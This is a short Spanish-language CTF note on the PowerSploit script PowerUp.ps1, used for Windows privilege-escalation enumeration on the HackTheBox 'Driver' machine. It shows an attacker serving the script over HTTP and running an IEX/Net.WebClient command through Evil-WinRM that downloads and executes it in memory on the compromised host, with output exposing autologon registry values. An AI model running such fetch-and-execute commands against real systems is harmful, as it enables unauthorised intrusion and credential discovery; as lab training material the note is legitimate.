Powerup.ps1

PowerUp.ps1 es un script de PowerShell desarrollado por Will Schroeder (@harmj0y), parte de la suite PowerSploit.

Su objetivo es automatizar la enumeración de configuraciones inseguras en sistemas Windows que puedan permitirte realizar una escalada local de privilegios.

Es muy útil en la fase de post-explotación cuando ya tenés acceso limitado (por ejemplo como tony en el CTF Driver) y querés encontrar maneras de obtener SYSTEM.

Algunas de las cosas que PowerUp.ps1 puede detectar:

  • Servicios con configuraciones inseguras (services misconfiguration)

  • Archivos con permisos inseguros

  • DLL hijacking opportunities

  • Tasks mal configuradas

  • Credenciales expuestas en registro

  • Bypass de UAC

  • Oportunidades de ejecución como SYSTEM

  • Drivers inseguros

En resumen: es una herramienta de enumeración de privesc enfocada en Windows, muy potente.

¿Como ejecutar este script desde remoto en una sesión del equipo comprometido con EvilWinRM?

En nuestro equipo levantamos un servidor con python desde la carpeta donde se encuentra el script PowerUp.ps1 y en el equipo comprometido tiramos el segundo comando:

┌──(root㉿kali)-[/home/kali/Documents/HTB/DRIVER]
└─# ls                
ntlmhash  PowerUp.ps1  pwned.scf  Rubeus.exe  shell2.exe  shell.exe  winPEASx64.exe
                                                                                                                    
┌──(root㉿kali)-[/home/kali/Documents/HTB/DRIVER]
└─# python3 -m http.server 80                            


Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.106 - - [12/Jun/2025 00:15:11] "GET /PowerUp.ps1 HTTP/1.1" 200 -
*Evil-WinRM* PS C:\temp> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2/PowerUp.ps1')
Access denied                                                                                                       

DefaultDomainName    : DRIVER
DefaultUserName      : tony
DefaultPassword      :
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons

Last updated